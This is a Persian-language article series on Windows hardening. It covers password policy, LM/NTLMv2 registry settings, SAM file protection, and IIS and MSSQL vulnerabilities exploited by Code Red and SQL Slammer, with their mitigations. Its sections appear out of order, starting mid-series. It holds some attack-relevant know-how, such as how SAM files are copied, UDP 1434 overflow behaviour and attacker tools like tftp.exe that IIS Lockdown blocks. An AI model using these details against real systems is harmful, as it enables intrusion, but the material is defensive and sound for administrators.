  Store password using reversible encryption for all users in the domain . سياست فوق ، مشخص می نمايد که می بايست رمزعبور با استفاده از رمزنگاری وارونه  ، ذخيره گردد . در اين رابطه ، امکانات حمايتی لازم درخصوص برنامه هائی که از پروتکل هائی بمنظور آگاهی از رمز عبور کاربر بمنظور انجام فرآيند تائيد کاربران استفاده می نمايند، نيز ارائه شده است . ذخيره سازی رمزهای عبوری که از رمزنگاری وارونه استفاده می نمايند ، مشابه رمزهای عبورمعمولی است ( رمز عبور بصورت متن ذخيره می گردد). بنابراين فعال شدن سياست فوق می بايست با لحاظ نمودن پارامترهای متعددی نظير الزام يک برنامه بمنظور استفاده از يک رمز عبور حفاظت شده ، صورت پذيرد .
  يکی از روش هائی که می توان از آن بمنظور ايجاد اتوماتيک و نسبت دهی رمزهای عبور پيچيده به  هر يک از account های کاربران  استفاده نمود ، اجرای دستورالمل زير از طريق خط دستور است :

From Command Line Prompt :

Net User Username / random

• با اجرای دستورالعمل فوق ، رمزهای عبور تصادفی و پيچيده (همواره هشت کاراکتر طول ) به يک account نسبت داده شده و در ادامه رمزعبور مورد نظر بر روی صفحه نمايش داده می شود. روش فوق ،  امکانی مناسب بمنظور نسبت دهی رمزهای عبوردر ارتبط با  Service accounts بوده و کمتر در ارتباط با  کاربران واقعی استفاده می گردد.
  بهترين روش برای مميزی کيفيت رمزهای عبور ، اجرای برنامه های cracking رمز عبور در وضعيتStand-alone است (بخشی از فرآيند بررسی رمزهای عبور)  . لازم است مجددا" به اين موضوع اشاره گردد که بدون کسب مجوز لازم از مديران ارشد سيستم در سازمان ، نمی بايست از برنامه های cracking استفاده شود.پس از کسب مجوز لازم بمنظور اجرای برنامه های cracking رمز عبور ، می بايست عمليات فوق را بر روی يک ماشين حفاظت شده انجام داد.کاربرانی که رمزهای عبور آنان crack  می گردد، می بايست موضوع  بصورت محرمانه به اطلاع آنان رسيده و دستورالعمل های لازم در خصوص نحوه انتخاب يک رمز عبور مناسب ، در اختيار آنان قرار داده شود.اخيرا" و در پاسخ به رمزهای عبور ضعيف ، استفاده از روش هائی ديگر بمنظور تائيد کاربران،  نظير بيومتريک (زيست سنجی )  ، نيز مورد توجه  واقع شده است .
• حفاظت رمزهای عبور مستحکم . حتی اگر رمزهای عبور ، مستحکم و قدرتمند باشند ، در صورت عدم حفاظت آنان توسط کاربران ، سيستم های موجود در يک سازمان در معرض تهديد قرار خواهند گرفت .  يک سياست امنيتی مناسب ، می بايست شامل دستورالعمل های لازم بمنظور آموزش کاربران در رابطه با حفاظت رمزهای عبور می باشد.عدم ارائه رمز عبور به افراد ديگر، عدم نوشتن رمز عبور در محلی که امکان خواندن آن برای ديگران وجود داشته باشد و حفاظت اتوماتيک فايل  هائی که رمزهای عبور در آن ذخيره شده اند ، از جمله مواردی می باشند که می بايست به کاربران آموزش داده شود. اغلب کاربران در مواجهه با پيامی مشابه "Your password has expired and must be changed,"  که نشاندهنده اتمام عمر مفيد يک رمز عبور است ، يک رمز عبور ضعيف را برای خود انتخاب می نمايند ، بنابراين لازم است در فرصت مناسب و قبل از برخورد با اينچنين پيام هائی ، به کاربران آموزش های لازم ارائه گردد.
• کنترل مستمر account ها . مديران سيستم و شبکه می بايست حضوری موثر و مستمر در ارتباط با مديريت  account های موجود داشته باشند .
  - هر گونه account  مبتنی بر سرويسی خاص و يا مديريتی که از آن استفاده نمی گردد، می بايست حذف گردد .
  - ممیزی account ها بر روی سيستم را انجام  داده و  لازم است در اين رابطه يک ليست اصلی ايجاد گردد .در اين رابطه می بايست رمزهای عبور در ارتباط با سيستم هائی نظير روترها ، چاپگرهای ديجيتالی متصل شده به اينترنت و ساير موارد ديگر نيز مورد بررسی قرار گيرد.
  - روتين هائی خاص بمنظور افزودن account های تائيد شده  به ليست و يا حذف  account هائی که ضرورتی به استفاده از آنان نمی باشد ، پياده سازی و همواره خود را پايبند به آن بدانيم .
  - اعتبار ليست را در فواصل زمانی خاصی بررسی تا از بهنگام بودن آن اطمينان حاصل گردد.
  - از روتين های  خاصی بمنظورحذف account متعلق به کارکنان و يا پيمانکارانی که سازمان را ترک نموده اند ، استفاده گردد .
• نگهداری و پشتيبانی از سياست رمزعبور . بمنظور پشتيبانی و نگهداری مناسب رمز عبور، می توان علاوه بر استفاده از امکانات کنترلی ارائه شده توسط سيستم عامل و يا سرويس های شبکه ، از ابزارهای گسترده ای که در اين رابطه ارائه  شده است ،نيز استفاده گردد . بدين ترتيب ،نگهداری سياست رمز عبور ، مبتنی بر آخرين تکنولوژی های موجود خواهد بود.
• غير فعال نمودن تائيد LM در شبکه . بهترين گزينه بمنظور جايگزينی با Lan Manager ، استفاده از روش NT LAN Manager version 2)  NTLMv2) است . متدهای چالش / پاسخ NTLMv2 ، با استفاده از رمزنگاری مستحکم تر و بهبود مکانيزم های تائيد ، اکثر صعف های LM را برطرف نموده است جدول زير ، کليد ريجستری موردنظری را که قابليت فوق را در ويندوز NT و 2000 کنترل می نمايد، نشان می دهد:

Rgistry key

Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Control\LSA Value: LMCompatibilityLevel Value Type: REG_DWORD - Number Valid Range: 0-5 Default: 0

• پارامتر فوق ، نوع و روش تائيد را مشخص و می تواند مقداری بين صفر تا پنج را دارا باشد :
  0 - ارسال پاسخ بر اساس روش  LM و NTLM ، هرگز از امکانات امنيتی NTLMv2 استفاده نمی شود .
  1 - استفاده از امکانات امنيتی NTLMv2
  2 - ارسال بر اساس روش  تائيد NTLM 
  3 - ارسال بر اساس روش تائيد NTLMv2
  4 - DC باعث  رد تائيد LM  می گرد.
  5 - DC باعث رد تائيد LM و NTLM شده و صرفا" تائيد NTLMv2 پذيرفته می گردد .
• در ويندوز 2000 ، 2003 و XP نيز امکاناتی ارائه شده است که می توان با استفاده از آنان اقدام به پيکربندی تنظيمات مورد نظر در ارتباط با سطح تائيد Lan Manager نمود . در اين رابطه لازم است  برنامه  Local Security Policy  فعال و در ادامه گزينه های  Local Policies  و  Security Options  بترتيب انتخاب گردند . در ويندوز 2000 سياست  LAN Manager authentication level ، و در ويندوز XP و 2003 سياست  Network security: LAN Manager authentication level ، بمنظور پيکربندی ومقداردهی مناسب انتخاب گردند .
  در صورتيکه بر روی تمامی سيستم ها ، ويندوز NT SP4 و يا بعد از آن  نصب شده باشد ، می توان مقدارپارامتر فوق را بر روی تمامی سرويس گيرندگان سه و بر روی Domain Controllers مقدار پنج درنظر گرفت (پيشگيری از ارسال LM hashes بر روی شبکه ) . سيستم هائی نظير ويندوز 95 و 98 از NTLMv2 بصورت پيش فرض بهمراه  Microsoft Network Client استفاده نمی نمايند ، بنابراين لازم است بمنظور استفاده از قابليت های NTLMv2 ، برنامه Directory Services Client  بر روی آنان نصب گردد. پس از نصب سرويس فوق ، مقدار ريجستری با نام LMCompatibility می تواند مقدار صفر و يا سه را دارا باشد .در صورتيکه نمی توان سرويس گيرندگان قديمی ( ويندوز 95 و يا ويندوز 98 ) را  ملزم به استفاده از NTLMv2 نمود ، می توان تغيير مورد نظر را در رابطه با LM hashing  نسبت به استفاده از NTLM   (NT Lan Manager, version ) در Domain Controller اعمال نمود.در اين رابطه می توان مقدار LMCompatibilityLevel  را چهار در نظر گرفت . درصورت استفاده  از ابزاری نظير Local Security Policy،می بايست مقدار LAN Manager authentication level را  Send NTLMv2 Response only\Refuse LM درنظر گرفت . لازم است به اين نکنه اشاره گردد که ايمن ترين گزينه در اين رابطه،  اعمال محدوديت برروی سرويس گيرندگان است .
• ممانعت از ذخيره سازی LM hash . يکی از مسائل اصلی در ارتباط با حذف LM hashes  در  شبکه ، ذخيره سازی آنان در  SAM و يا اکتيو دايرکتوری است  .مايکروسافت دارای مکانيزمی بمنظور غيرفعال نمودن ايجاد LM hashes بوده  ولی امکان استفاده از آن صرفا" در سيستم های  ويندوز 2000 ( SP2 و يا بعد بر روی آنان نصب شده است ) ، 2003 و XP   بوجود دارد. کليد ريجستری زير، کنترل عمليات فوق راانجام می دهد. در صورتيکه بر روی Windows 2000 Domain Controller کليد فوق ايجاد شده باشد ، LanMan hashes  ، در ادامه ايجاد نخواهد شد و در اکتيو دايرکتوری نيز ذخيره نمی گردد. در ويندوز 2003 و XP ، می توان با فعال نمودن گزينه  Network security: Do not store LAN Manager hash value on next password change   به اهداف موردنظر در رابطه با ذخيره سازی LM hash دست يافت . در اين رابطه لازم است  برنامه  Local Security Policy  فعال و در ادامه گزينه های  Local Policies  و  Security Options  بترتيب انتخاب گردند  . پس از اعمال تغييرات فوق ، می بايست سيستم راه اندازی شده تا تغييرات ايجاد شده ، موثر واقع شوند . لازم است به اين نکته مهم اشاره گردد که روش های ارائه شده ، صرفا" پيشگيری لازم در خصوص ايجاد LM hashes جديد راانجام داده و LM hashes موجود بصورت انفرادی و در زمانيکه کاربر رمز عبور خود را تغيير دهد ، حذف خواهند شد .

Rgistry key

Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Control\LSA\NoLMHash

• ممانعت و پيشگيری از تکثير Hash و بانک های اطلاعاتی SAM
  ابزارهای cracking  رمزعبور، بمنظور بدست آوردن رمزهای عبور hashes  از روش های زير استفاده می نمايند :
  - کشف رمزهای عبور از شبکه . بدين منظور موارد زير پيشنهاد می گردد :
  - استفاده از شبکه های سوئيچ شده .
  - تشخيص و حذف کارت های شبکه بی هدف موجود در شبکه (در اين رابطه می توان از ابزارهای امنيتی خاصی نظير ethereal استفاده کرد)  .
  - تکثير فايل SAM . فايل فوق در ويندوز NT4 و 2000 در فولدر SystemRoot%\System32\Config%  (عموما" در مسير C:\Winnt\System32\Config ) و در ويندوز XP و يا 2003 در فولدر  C:\Windows\System32\Config مستقرمی باشد.، فايل فوق ، توسط سيستم عامل ويندوز Lock و صرفا" زمانی امکان تکثيرآن  وجود خواهد داشت که ماشين با يک سيستم عامل ديگر راه اندازی شده باشد. فايل SAM را می توان با استفاده از فايل Backup مربوطه نيز بدست آورد.
  بمنظور پيشگيری از تکثير فايل SAM و افزايش سطح امنيتی سيستم لازم است دستيابی فيزيکی به سيستم های موجود خصوصا" Domain Controllers محدود و همواره از اطلاعات Backup  گرفته شده و ديسک Repair  نيز بمنظور برخورد با مشکلات آتی ايجاد گردد .

برای اخد اطلاعات نکميلی می توان  از مقالات زير استفاده نمود:

- How to Disable LM Authentication on Windows NT
- How to Enable NTLMv2 Authentication for Windows 95/98/2000/NT
- New Registry Key to Remove LM Hashes from Active Directory and Security Account Manager

در بخش سوم اين مقاله به بررسی ساير نقاط آسيب پذير ويندوز خواهيم پرداخت .

سيستم عامل، يکی از عناصر چهار گانه در يک سيستم کامپيوتری است که دارای نقشی بسيار مهم و حياتی در نحوه مديريت منابع سخت افزاری و نرم افزاری است . پرداختن به مقوله  امنيت سيستم های عامل ، همواره از بحث های مهم در رابطه با ايمن سازی اطلاعات در يک سيستم کامپيوتری بوده که امروزه با گسترش اينترنت ، اهميت آن مضاعف شده است . بررسی و آناليز امنيت در سيستم های عامل می بايست با ظرافت و در چارچوبی کاملا" علمی و با در نظر گرفتن تمامی واقعيت های موجود ، انجام تا از يک طرف تصميم گيرندگان مسائل استراتژيک در يک سازمان قادر به انتخاب مستند و منطقی يک سيستم عامل باشند و از طرف ديگر امکان نگهداری و پشتيبانی آن با در نظر گرفتن مجموعه تهديدات موجود و آتی  ، بسرعت و بسادگی ميسر گردد .
اکثر کرم ها و ساير حملات موفقيت آميز در اينترنت ، بدليل وجود نقاط آسيب پذير در تعدادی  اندک  از سرويس های سيستم  های عامل متداول است . مهاجمان ، با فرصت طلبی خاص خود از روش  های متعددی بمنظور سوء استفاده از نقاط ضعف امنيتی شناخته شده ، استفاده نموده  و در اين راستا ابزارهای  متنوع ، موثر و گسترده ای را بمنظور نيل به اهداف خود ، بخدمت می گيرند . مهاجمان ، در اين رهگذر متمرکز بر سازمان ها و موسساتی می گردند که هنوز مسائل موجود امنيتی ( حفره ها و نقاط آسيب پذير ) خود را برطرف نکرده و بدون هيچگونه تبعيضی آنان را بعنوان هدف ، انتخاب می نمايند . مهاجمان بسادگی و بصورت مخرب ،  کرم هائی نظير : بلستر ، اسلامر و Code Red را در شبکه  منتشر می نمايند. آگاهی از مهمترين نقاط آسيب پذير در سيستم های  عامل ، امری ضروری است . با شناسائی و آناليز اينگونه نقاط آسيب پذير توسط کارشناسان امنيت اطلاعات ، سازمان ها و موسسات قادر به استفاده از مستندات علمی تدوين شده بمنظور برخورد منطقی با مشکلات موجود و ايجاد يک لايه حفاظتی مناسب می باشند.
در مجموعه مقالاتی که ارائه خواهد شد ، به بررسی مهمترين نقاط آسيب پذير ويندور خواهيم پرداخت . در اين راستا ، پس از معرفی هر يک از نقاط آسيب پذير ، علت وجود ضعف امنيتی ، سيستم های عامل در معرض تهديد ، روش های  تشخيص آسيب پذيری سيستم و نحوه مقابله و يا پيشگيری در مقابل هر يک از نقاط آسيب پذير ، بررسی می گردد .همزمان با  ارائه مجموعه مقالات مرتبط با ويندوز ( پنج مقاله ) ، به بررسی مهمترين نقاط آسيب پذير در يونيکس و لينوکس  ، طی مقالات جداگانه ای خواهيم پرداخت .
همانگونه که اشاره گرديد ، اغلب تهديدات و حملات ، متاثر از وجود نقاط آسيب پذير در سيستم های عامل بوده که زمينه تهاجم را برای مهاجمان فراهم می آورد .  شناسائی و آناليز نقاط آسيب پذير در هر يک از سيستم های عامل ، ماحصل  تلاش و پردازش دهها کارشناس امنيتی ورزيده در سطح جهان است و می بايست مديران سيستم و شبکه در يک سازمان بسرعت با آنان آشنا و اقدامات لازم را انجام دهند.
نقاط آسيب پذير موجود در هر سيستم عامل  که در ادامه به آنان اشاره می گردد ، سندی پويا و شامل دستورالعمل های لازم بمنظور برخورد مناسب با هر يک از نقاط آسيب پذير و لينک هائی به ساير اطلاعات مفيد و تکميلی مرتبط با ضعف امنيتی است .

مهمترين نقاط آسيب پذير ويندوز :
ويندوز ، يکی از سيستم های عامل رايج در جهان بوده که امروزه در سطح بسيار وسيعی استفاده می گردد . تا کنون حملات متعددی توسط مهاجمين متوجه سيستم هائی بوده است که از ويندوز ( نسخه های متفاوت )  بعنوان سيستم عامل استفاده می نمايند . با توجه به حملات متنوع و گسترده انجام شده ، می توان مهمترين نقاط آسيب پذير ويندوز را به ده گروه عمده تقسيم نمود :

• Internet Information Services (IIS)
• Microsoft SQL Server (MSSQL )
• Windows Authentication
• Internet Explorer (IE )
• Windows Remote Access Services
• Microsoft Data Access Components (MDAC)
• Windows Scripting Host (WSH)
• Microsoft Outlook Outlook Express
• Windows Peer to Peer File Sharing (P2P)
• Simple Network Management Protocol (SNMP)

در بخش اول اين مقاله ، به بررسی IIS  وMSSQL  (موارد يک و دو)  ، خواهيم پرداخت .

اولين نقطه آسيب پذير :  ( Internet Information Services (IIS
نصب  برنامه IIS با تنظيمات و پيکربندی پيش فرض ، آسيب پذيری خود را در موارد متعددی به اثبات رسانده و می تواند زمينه تهديدات زير را فراهم نمايد :

• غير فعال نمودن سرويس ( DoS )
• نمايش و بمخاطره انداختن  فايل ها و داده های حساس
• اجراء دستورات خودسرانه ( اختياری )
• بمخاطره انداختن کامل سرويس دهنده

IIS از پتانسل  شناخته شده ISAPI ( فايل هائی با انشعاب DLL که به آنان فيلترهای ISAPI هم گفته می شود ) بمنظور همبستگی  و ارتباط با  فايل هائی که دارای انشعاباتی خاص می باشند ، استفاده می نمايد . پيش پردازنده هائی نظير ColdFusion و PHP از ISAPI استفاده می نمايند.IIS ، از فيلترهای  ISAPI  ديگر برای انجام عمليات مرتبط با ASP)Active Server Pages ، ( SSI)Server Side Includes) و اشتراک چاپ مبتنی بر وب ، استفاده می نمايد.تعداد زيادی از فيلترهای ISAPI ، مستلزم عمليات خاص و جداگانه ای برای نصب نبوده و عملا" بصورت پيش فرض و در زمان نصب IIS  بر روس سيستم مستقر ( نصب ) می گردند . اکثر فيلترهای فوق ، قابل سوء استفاده توسط مهماجمان می باشند. Code red و Code Red 2  ، نمونه هائی از برنامه های مخرب می باشند که از ضعف فوق در جهت پيشبرد اهداف خود استفاده نموده اند . 
IIS نيز نظير ساير سرويس دهندگان وب ، شامل برنامه های نمونه ای است  که بمنظور اثبات توانائی سرويس دهنده وب ، طراحی شده اند . در طراحی برنامه های فوق ، عملکرد آنان با لحاظ نمودن مسائل امنيتی در يک محيط عملياتی و توليدی مورد توجه قرار نگرفته است . برخی ازنمونه برنامه های ارائه شده بهمراه IIS ، امکان مشاهده و بازنويسی فايل های دلخواه  ويا دستيابی  از راه دور به اطلاعات حساس نظير رمز عبور مديريت سيستم را فراهم می نمايند .
عدم بهنگام سازی و نگهداری مناسب IIS پس از نصب اوليه ، از ديگر مواردی است که زمينه تهاجم برای مهاجمان را فراهم می آورد .مثلا" نقاط آسيب پذير WebDAV ntdll.dll   در IIS 5.0 ، امکان حملات از نوع  DoS ( غيرفعال نمودن سرويس )  را فراهم و مهاجمان در ادامه قادر به  ايجاد و اجرای اسکريپت های مورد نظر خود بر روی سرويس دهنده می گردند . در مواردی ديگر  و با توجه به نقاط آسيب پذير موجود ، مهاجمان قادر به اجرای دستورات دلخواه خود بر روی سرويس دهنده می باشند (  درخواست دقيق و ماهرانه آدرس های URL  ) .
امکانات و پتانسيل هائی که در ادامه و با توجه به ضرورت بر روی IIS نصب می گردند ( نظير ColdFusion و PHP )  نيز می تواند زمينه بروز نقاط آسيب پذير جديدی را فراهم نمايد .اينگونه نقاط آسيب پذير، می تواند بدليل عدم پيکربندی صحيح و يا وجود ضعف و اشکال امنيتی  در محصول نصب شده ای باشد که  به  IIS نيز سرايت می نمايد ( توارث مشکلات و ضعف های امنيتی از يک محصول به محصول ديگر) .
سيستم های عامل در معرض تهديد :

• ويندوز NT 4.0 که از IIS 4.0 استفاده می نمايد .
• ويندوز 2000 سرويس دهنده که از IIS 5.0 استفاده می نمايد .
• ويندوز XP نسخه Professional که از نسخه IIS 5.1 استفاده می نمايد .

در رابطه با نقطه آسيب پذير فوق بر روی ويندوز 2003 که از IIS 6.0 استفاده می نمايد ، تاکنون گزارشی ارائه نشده است .
نحوه تشخيص آسيب پذيری سيستم
در صورتيکه برنامه IIS بصورت پيش فرض و استاندارد نصب و يا  Patch های  مربوطه بر روی آن نصب نشده باشند ، آسيب پذيری برنامه فوق در مقابل حملات قطعی خواهد بود . مديران سيستم وشبکه  که مسئوليت نصب ، نگهداری و بکارگيری IIS را بر عهده دارند ، می بايست خود را با جديدترين ابزارهای  مايکروسافت و مستندات امنيتی ارائه شده در رابطه با مديريت مناسب IIS ، بهنگام نمايند. در اين رابطه می توان بمنظور دستيابی به مستندات امنيتی مرتبط با IIS از مرکز امنيتی IIS شرکت مايکروسافت استفاده نمود. پيشنهاد می گردد ، برنامه  Microsoft BaseLine Security Analyzer را که شامل روتين های حفاظتی مناسب و مرتبط به IIS می باشد را دريافت و از آن بمنظور بررسی وضعيت امنيتی IIS استفاده بعمل آيد . مديران شبکه ، می بايست با استفاده از منابع اطلاعاتی متعدد ارائه شده نظير : Checklists ، مستنداتی  که توصيه های لازم در جهت ارتقاء سطح امنيتی را ارائه و مستندات آموزشی نقاط آسيب پذير که توسط  مايکروسافت ارائه شده است ،  دانش خود را بهنگام  و با دنبال نمودن فرآيندهای مناسب فنی ، از صحت عملکرد امنيتی IIS بر روی سيستم های سازمان خود اطمينان حاصل نمايند.مقايسه وضعيت موجود IIS با وضعيت مطلوب ،  يکی از روش هائی است که می تواند در اين زمينه مفيد واقع گردد .

نحوه حفاظت در مقابل نقطه آسيب پذير
نصب آخرين Patch ارائه شده : در اولين مرحله ، می بايست  سيستم را با استفاده از Patch های ارائه شده ، بهنگام نمود. Patching يک سرويس دهنده نصب شده ، امری ضروری است  ولی بتنهائی کافی نخواهد بود . بموازات کشف نقاط ضعف جديد در IIS  ، می بايست  از Patch مربوطه بسرعت استفاده گردد. Windows Update و AutoUpdate گزينه هائی مناسب بمنظور بهنگام سازی IIS با توجه به آخرين Patch های ارائه شده است .
برنامه ( HFNetChk ( Network Security Hotfix Checker ، به مديران سيستم کمک  لازم در پويش و بررسی محلی و يا از راه دور سيستم ها برای Patch های موجود را ارائه می نمايد . ابزار فوق ، قابل استفاده بر روی ويندوز NT 4.0 ، ويندوز 2000 و ويندوز XP می باشد . آخرين نسخه ابزار فوق را می توان از آدرس  http://www.microsoft.com/technet/security/tools/hfnetchk.asp دريافت کرد .
در صورتيکه از برنامه های اضافه شده ای  نظير CouldDusion ،PerlIIS و يا PHP بهمراه IIS استفاده می گردد ، لازم است به سايت های عرضه کنندگان هر يک از محصولات فوق مراجعه و نسبت به آخرين patch ارائه شده در رابطه با هر محصول آگاه و آنان را با توجه به توصيه های انجام شده بر روی سيستم نصب نمود . امکان Windows Update و ساير سرويس های بهنگام سازی ارائه شده توسط مايکروسافت ، شامل Patch های لازم و مرتبط با محصولات اضافه شده ساير شرکت ها در برنامه IIS مايکروسافت نبوده  و لازم است مديران سيستم بهنگام سازی محصولات اضافه شده ( غير مايکروسافت ) در IIS را خود راسا"  انجام دهند .
استفاده از برنامه کمکی IIS Lockdown بمنظورنصب مطمئن تر : مايکروسافت ، ابزاری ساده بمنظور ايمن سازی نصب IIS را ارائه که ويزارد IIS Lockdown ناميده می شود. نسخه موجود را می توان از آدرس http://www.microsoft.com/technet/security/tools/locktool.asp ، دريافت نمود. با اجرای برنامه فوق در حالت " Custom " و يا " Expert" ، می توان تغييرات مورد نظر خود را در ارتباط با نصب IIS مشخص نمود. بدين ترتيب ، امکان اعمال تغييرات زير در رابطه با نصب IIS ، فراهم می گردد :

• غير فعال نمودن WebDAV ( مگر اينکه محيط مورد نظر شما به وجود آن برای نشر محتوی وب ، نياز داشته باشد )
• غير فعال نمودن ISAPI extensions های غير ضروری ( نظير : htr، .idq , .ism ، .printer . )
• حذف نمونه برنامه های ارائه شده بهمراه IIS
• منع سرويس دهنده وب از اجراء دستورات سيستمی متداول که عموما" توسط مهاجمان استفاده می گردد( نظير cmd.exe و يا tftp.exe ) .

استفاده از URLScan بمنظور فيلتر نمودن درخواست های HTTP : تعدادی زيادی از حملات مرتبط با نقاط آسيب پذير IIS نظير Code Blue و خانواده Code Red ، از کدهای مخربی که بصورت درخواست های HTTP  سازماندهی می شوند،استفاده می نمايند( حملاتی از نوع  Buffer Overflow ) . فيلتر URLScan را می توان بگونه ای پيکربندی نمودکه باعث عدم پذيرش اينچنين درخواست هائی قبل از پردازش آنان توسط سرويس دهنده باشد.برنامه فوق،بهمراه ويزارد IIS Lockdown ارائه ولی می توان آن را از آدرس : http://www.microsoft.com/technet/security/tools/urlscan.asp نيز دريافت کرد .

دومين  نقطه آسيب پذير :  ( Microsoft SQL Server (MSSQL
سرويس دهنده SQL مايکروسافت ( MSSQL ) ، دارای چندين نقطه آسيب پذير جدی است که امکان دريافت  اطلاعات حساس، تغيير در محتويات بانک اطلاعاتی وبمخاطره انداختن حيات سرويس دهندگان SQL  توسط مهاجمان را فراهم می نمايد . در برخی موارد خاص و بدليل عدم پيکربندی  صحيح سيستم  ، ميزبانان سرويس دهنده نيز ممکن است در معرض تهديد و آسيب قرار گيرند . نقاط آسيب پذير MSSQL ، مورد توجه خاص عموم مهاجمان بوده و آنان بسرعت از ضعف های امنيتی کشف شده در جهت اهداف خود استفاده می نمايند. دو کرم  SQLSnake/Spida و  SQL-Slammer/SQL-Hell/Sapphire  در ساليان اخير ( سال های 2002 و 2003 )  از نقاط ضعف شناخته شده  MSSQL  استفاده و توانستند در مدت زمان کوتاهی حملات گسترده ای را با توجه به نقظه آسيب پذير فوق ،انجام دهند. ميزبانان آلوده به کرم ها ی فوق ، بمنظور گسترش آلودگی  و جستجو جهت يافتن ساير سيستم های آسيب پذير ، ترافيک شبکه را در حد بالائی افزايش داده بودند( اشغال درصد بسيار بالائی از پهنای باند محيط انتقال ).  برای دريافت اطلاعات تکميلی در رابطه با کرم های فوق ، می توان از منابع و آدرس های زير استفاده نمود :

اطلاعات تکميلی در رابطه با کرم SQLSnake/Spida  ( فعال شده در May 2002 )  :

• http://isc.incidents.org/analysis.html?id=157
• http://www.eeye.com/html/Research/Advisories/AL20020522.html
• http://www.cert.org/incident_notes/IN-2002-04.html

اطلاعات تکميلی در رابطه با کرم  SQL-Slammer/SQL-Hell/Sapphire ( فعال شده در تاريخ January 2003 ) :

• http://isc.incidents.org/analysis.html?id=180
• http://www.nextgenss.com/advisories/mssql-udp.txt
• http://www.eeye.com/html/Research/Flash/AL20030125.html
• http://www.cert.org/advisories/CA-2003-04.html

براساس گزارش ارائه شده توسط  Internet Storm Center ، پورت های  1433 و 1434 ( پورت های پيش فرض سرويس دهنده MSSQL )  ، از جمله پورت هائی می باشند که بصورت دائم توسط مهاجمين مورد بررسی ( نگاه موشکافانه ) قرار می گيرد.
نحوه عملکرد کرم SQLSnake ، به account مديريتی پيش فرض (   sa" account"  که دارای يک رمز عبور Null می باشد )  بستگی دارد.در اين رابطه لازم است پيکربندی سيستم بطرز صحيحی انجام و هر يک از سيستم های موجود بمنظور حصول اطمينان از دارا بودن رمز عبور مرتبط با account مربوطه بررسی و بدرستی حفاظت گردند . در صورتيکه از account خاصی استفاده نمی شود ، می بايست نسبت به غير فعال نمودن آنان اقدام گردد.. بمنظوردريافت اطلاعات تکميلی در رابطه تنظيم و مديريت sa Account ، می توان از مستندات ارائه شده در آدرس " Changing the SQL Sever Administrator Login "  استفاده نمود . sa Account ، می بايست دارای يک رمز عبور پيچيده بوده که حدس و تشخيص آن مشکل باشد( حتی اگر از آن بمنظور اجراء SQL/MSDE استفاده نمی شود ) .
نحوه عملکرد کرم SQL Slammer ، بر اساس يک Buffer Overflow در  SQL Server Resolution Service  است . Buffer Overflow  فوق ، موجب گسترش ( حمل )  مشکل از سيستمی به سيستم ديگر شده و در اين راستا امنيت ميزبان زمانيکه کرم اقدام به ارسال بسته های اطلاعاتی تهديد آميز خود به پورت 1434 سيستم های مقصد آسيب پذير می نمايد، در معرض تهديد و آلودگی قرار می گيرد. در صورتيکه بر روی يک ماشين ، سرويس هائی از SQL اجراء که مرتبط با اين نوع Stack Buffer Overflow می باشند و بسته های اطلاعاتی خود را  بر اساس واقعيت فوق دريافت می نمايد ، تمامی سيستم ها و سرويس دهندگان در معرض تهديد قرار خواهند گرفت .موثرترين روش دفاع در مقابل کرم فوق، Patching مستمر ، اقدامات لازم در جهت پيکربندی سيستم بصورت کنشگرايانه ، پيشگيری سيستم بصورت پويش های ادواری و  فيلترينگ پورت 1434 مربوط به UDP در gatway های شبکه است ( اجازه ورود و خروج بسته های اطلاعاتی مرتبط با پورت اشاره شده ) .
عملکرد Microsoft Server 2000 Desktop Engine ) ،  MSDE 2000)، را می توان بعنوان " SQL Server Lite" ( زير بناء سرويس دهنده SQL ) در نظرگرفت . تعداد زيادی از صاحبان سيستم حتی نسبت به اين موضوع که بر روی سيستم آنان MSDE اجراء و آنان دارای يک نسخه از SQL Server نصب شده بر روی سيستم می باشند ، آگاهی و شنخت مناسبی را ندارند.  MSDE 2000 ، بعنوان يکی از اجزاء اساسی بهمراه محصولات زير نصب می گردد :

• SQL/MSDE Server 2000 (Developer, Standard and Enterprise Editions)
• Visual Studio .NET (Architect, Developer and Professional Editions)
• ASP.NET Web Matrix Tool
• Office XP
• Access 2002
• Visual Fox Pro 7.0/8.0

علاوه بر موارد فوق،نرم افزارهای متعدد ديگری وجود دارد که از MSDE 2000  استفاده می نمايند . برای مشاهده ليست تمامی محصولات مربوطه ، می توان از اطلاعات موجود در آدرس : http://www.SQLsecurity.com/forum/applicationslistgridall.aspx استفاده نمود . باتوجه به اينکه، نرم افزارهای فوق ، از MSDE بعنوان هسته اساسی بانک اطلاعاتی استفاده می نمايند ، آنان نيز دارای  نقاط آسيب پذير مشابه  سرويس دهنده SQL/MSDE  خواهند بود.پيکربندی MSDE 2000 را می توان بگونه ای انجام داد  که با استفاده از روش های مختلف به درخواست های اتصال به بانک اطلاعاتی توسط سرويس گيرندگان،گوش داده شود. مثلا"  پيکربندی فوق را می توان بصورتی انجام داد که سرويس گيرندگان قادر به استفاده از named pipes بر روی يک NetBIOS Session ( پورت  139/445 پورت TCP ) بوده  و يا از سوکت هائی که سرويس گيرندگان با استفاده از پورت 1433 مربوط به TCP به آن متصل می گردند ( امکان استفاده از هر دو رويکرد اشاره شده نيز وجود دارد ) . صرفنظر ازروش انتخابی ، سرويس دهنده SQL و MSDE همواره به پورت 1434 مربوط به UDP گوش خواهند داد . پورت فوق بعنوان يک پورت هماهنگ کننده طراحی شده است . سرويس گيرندگان يک پيام را برای پورت فوق ارسال تا  نحوه اتصال سرويس گيرنده به سرويس دهنده ، مشخص گردد .
هسته MSDE 2000 ،در موارديکه با يک بسته اطلاعاتی تک بايتی 0x02  ، بر روی پورت 1434 مربوط به UDP مواجه گردد ، اطلاعاتی در رابطه با خود را برمی گرداند . ساير بسته های اطلاعاتی تکی بايت بدون اينکه الزامی به تائيد آنان برای سرويس دهنده وجود داشته باشد،باعث  بروز يک Buffer overflow می گردند .با توجه به اينکه سازماندهی حملات ازاين نوع  بر اساس UDP انجام خواهد شد ، وضعيت تهاجم فوق وخيم تر خواهد شد .  (صرفنظر از اينکه پردازه های  MSDE 2000  در يک بافتار امنيتی مربوط به  يک Domain User و يا account مربوط به Local System  اجراء می گردند). استفاده موفقيت آميز از حفره های امنيتی موجود ، می تواند سيستم مقصد را در معرض مخاطره و تهديد قرار دهد .
